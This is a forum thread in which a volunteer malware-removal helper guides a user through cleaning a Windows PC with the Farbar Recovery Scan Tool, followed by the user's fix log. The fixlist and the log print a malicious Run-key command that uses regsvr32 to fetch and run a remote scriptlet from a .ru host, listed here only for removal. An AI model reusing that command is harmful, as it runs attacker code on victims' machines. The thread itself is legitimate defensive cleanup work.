FirewallRules: [UDP Query User{EA30A5C2-3339-4E01-815F-7D6A8EA81AE6}C:\users\gaya\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{F3EC749C-FDBC-44DB-B00C-75C55488A63B}C:\users\gaya\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{EB7199FD-A434-4F0A-961F-2B7D15046C3A}] => (Allow) C:\Users\Gaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{0301DF89-2FCB-4543-B9F2-0A4B56F54463}] => (Allow) C:\Users\Gaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [{6A1525A1-B726-427D-BFBC-93E061C8D4C0}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{C840D465-5EAA-4F53-BED4-7E482AD0321C}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{BAD93C08-C447-4750-B48F-F13123F9BE2A}] => (Allow) LPort=1900
FirewallRules: [{891EB9F3-7246-480F-83B7-91DA9A0EABDD}] => (Allow) LPort=2869
FirewallRules: [{F60BA5C2-4115-4761-BD74-603CA20AD331}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{A14ADB91-BD61-41D6-9D10-5AEFA467A5A7}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{A2E245AB-ACB5-425C-889A-954BEFF15221}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{81CDFDBC-F47C-4AF8-99F1-F67A6D6A1870}] => (Allow) C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{613EA8A0-A8F0-4795-A483-C06A31FC760C}] => (Allow) C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{73123AF8-D00F-4D52-B5B2-9EED1AA52B61}] => (Allow) C:\Users\Ligaya\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{26E4F075-5B2E-47B9-9C5A-13D314EA1312}] => (Allow) C:\Users\Ligaya\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{62E40FF5-1235-408A-BA03-16590FCF5D63}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5CAD92DD-59E6-4C38-B62E-06EAC13A7FB2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{154A0093-AA20-4781-99A1-9A0205E31C5A}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{A6D4F2C6-A315-4E0E-A991-7B3C0850B34D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{F0206348-A801-46F0-98B1-2700287BF2B5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
02-08-2017 06:30:20 Windows Update
05-08-2017 19:57:56 Windows Update
09-08-2017 15:44:51 Windows Update
13-08-2017 10:00:15 Windows Update
16-08-2017 20:30:01 Windows Update
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/19/2017 08:31:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Setup.exe_Microsoft Setup Bootstrapper, version: 14.0.4734.1000, time stamp: 0x4b581e85
Faulting module name: OSETUP.DLL, version: 14.0.4734.1000, time stamp: 0x4b581ebc
Exception code: 0xc0000417
Fault offset: 0x002f6433
Faulting process id: 0x5c8
Faulting application start time: 0x01d3188290dcdcc7
Faulting application path: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
Faulting module path: C:\Users\Ligaya\AppData\Local\Temp\Setup000005c8\OSETUP.DLL
Report Id: cf862536-8475-11e7-8231-7845c4c1808f
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 08:31:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Setup.exe_Microsoft Setup Bootstrapper, version: 14.0.4734.1000, time stamp: 0x4b581e85
Faulting module name: OSETUP.DLL, version: 14.0.4734.1000, time stamp: 0x4b581ebc
Exception code: 0xc0000417
Fault offset: 0x002f6433
Faulting process id: 0xbbc
Faulting application start time: 0x01d318828ac0c1d6
Faulting application path: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
Faulting module path: C:\Users\Ligaya\AppData\Local\Temp\Setup00000bbc\OSETUP.DLL
Report Id: c9a0e111-8475-11e7-8231-7845c4c1808f
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 08:28:27 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\AVAST Software\Avast\setup\iplugins\IStats.dll".
Dependent Assembly Avast.VC110.CRT,processorArchitecture="x86",publicKeyToken="2036b14a11e83e4a",type="win32",version="11.0.60610.1" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/19/2017 08:28:08 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\AVAST Software\Avast\setup\iplugins\IStats.dll".
Dependent Assembly Avast.VC110.CRT,processorArchitecture="x86",publicKeyToken="2036b14a11e83e4a",type="win32",version="11.0.60610.1" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/19/2017 08:09:24 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\AVAST Software\Avast\setup\iplugins\IStats.dll".
Dependent Assembly Avast.VC110.CRT,processorArchitecture="x86",publicKeyToken="2036b14a11e83e4a",type="win32",version="11.0.60610.1" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/19/2017 03:52:58 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office Office 64-bit Components 2010 - Update 'Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (08/19/2017 03:52:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsiExec.exe, version: 5.0.9600.18333, time stamp: 0x572b8067
Faulting module name: msvcrt.dll, version: 7.0.9600.17415, time stamp: 0x545055fe
Exception code: 0xc00000fd
Fault offset: 0x00000000000022a3
Faulting process id: 0x179c
Faulting application start time: 0x01d3185b8fd5a323
Faulting application path: C:\Windows\System32\MsiExec.exe
Faulting module path: C:\WINDOWS\system32\msvcrt.dll
Report Id: d4e9e9fd-844e-11e7-822f-606c66264890
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 03:52:45 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsiExec.exe, version: 5.0.9600.18333, time stamp: 0x572b8067
Faulting module name: msvcrt.dll, version: 7.0.9600.17415, time stamp: 0x545055fe
Exception code: 0xc00000fd
Fault offset: 0x00000000000022a3
Faulting process id: 0x1708
Faulting application start time: 0x01d3185b8adc3dbd
Faulting application path: C:\Windows\System32\MsiExec.exe
Faulting module path: C:\WINDOWS\system32\msvcrt.dll
Report Id: cd5c0908-844e-11e7-822f-606c66264890
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 02:21:45 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office Office 64-bit Components 2010 - Update 'Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (08/19/2017 02:21:44 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsiExec.exe, version: 5.0.9600.18333, time stamp: 0x572b8067
Faulting module name: msvcrt.dll, version: 7.0.9600.17415, time stamp: 0x545055fe
Exception code: 0xc00000fd
Fault offset: 0x00000000000022a3
Faulting process id: 0x378
Faulting application start time: 0x01d3184ec556a9fa
Faulting application path: C:\Windows\System32\MsiExec.exe
Faulting module path: C:\WINDOWS\system32\msvcrt.dll
Report Id: 164afdc0-8442-11e7-822f-606c66264890
Faulting package full name: 
Faulting package-relative application ID:
 
 
System errors:
=============
Error: (08/19/2017 09:24:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:24:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:24:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:21:55 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (08/19/2017 09:19:57 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (08/19/2017 09:19:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:19:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:19:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:18:06 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (08/19/2017 09:17:48 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
 
CodeIntegrity:
===================================
  Date: 2017-08-19 09:23:39.189
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-19 09:23:38.726
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-19 02:23:53.899
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-17 19:33:40.531
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-17 13:00:04.180
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-17 11:30:31.160
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-14 18:48:17.938
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-14 12:52:51.941
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-13 10:06:01.716
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-10 17:10:44.121
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-3337U CPU @ 1.80GHz
Percentage of memory in use: 46%
Total physical RAM: 3993.09 MB
Available physical RAM: 2138.37 MB
Total Virtual: 4825.09 MB
Available Virtual: 3351.12 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:248.95 GB) (Free:175.43 GB) NTFS
Drive f: (Hunter) (Fixed) (Total:439.45 GB) (Free:46.2 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 4E744ED0)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 39,962 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:12:16 PM

Posted 19 August 2017 - 10:00 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== ATTENTION
URLSearchHook: [S-1-5-21-1090255531-1958037965-2896169239-1001] ATTENTION => Default URLSearchHook is missing
Toolbar: HKU\.DEFAULT -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi => not found
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
AlternateDataStreams: C:\WINDOWS\system32\Drivers\btmhsf.sys:Microsoft_Appcompat_ReinstallUpgrade [0]
AlternateDataStreams: C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg:com.dropbox.attributes [320]
AlternateDataStreams: C:\Users\Ligaya\Desktop\TRAVEL.txt:com.dropbox.attributes [168]
FirewallRules: [UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
C:\windows\kmsemulator.exe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after these updates remove these old version(s) via the Control Panel > Programs > Programs and Features.
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java SE Development Kit 8 Update 25 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180250}) (Version: 8.0.250.18 - Oracle Corporation)

Please post the Fixlog.txt and let me know if the problem persists.

#3 Gaya19

Gaya19
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:16 AM

Posted 21 August 2017 - 10:17 PM

Hi Nasdaq! Thanks so much for your time and help. Here are the contents of the Fixlog.txt.

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-08-2017
Ran by Ligaya (22-08-2017 10:47:58) Run:1
Running from C:\Users\Ligaya\Desktop
Loaded Profiles: Ligaya (Available Profiles: UpdatusUser & Ligaya)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== ATTENTION
URLSearchHook: [S-1-5-21-1090255531-1958037965-2896169239-1001] ATTENTION => Default URLSearchHook is missing
Toolbar: HKU\.DEFAULT -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi => not found
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
AlternateDataStreams: C:\WINDOWS\system32\Drivers\btmhsf.sys:Microsoft_Appcompat_ReinstallUpgrade [0]
AlternateDataStreams: C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg:com.dropbox.attributes [320]
AlternateDataStreams: C:\Users\Ligaya\Desktop\TRAVEL.txt:com.dropbox.attributes [168]
FirewallRules: [UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
C:\windows\kmsemulator.exe
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Software\Microsoft\Windows\CurrentVersion\Run\\COM+ => value removed successfully
Could not restore Default URLSearchHook.
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value removed successfully
HKLM\Software\Classes\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => key not found. 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value not found.
HKLM\Software\Classes\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => key not found. 
HKLM\Software\Classes\PROTOCOLS\Handler\skype4com => key removed successfully
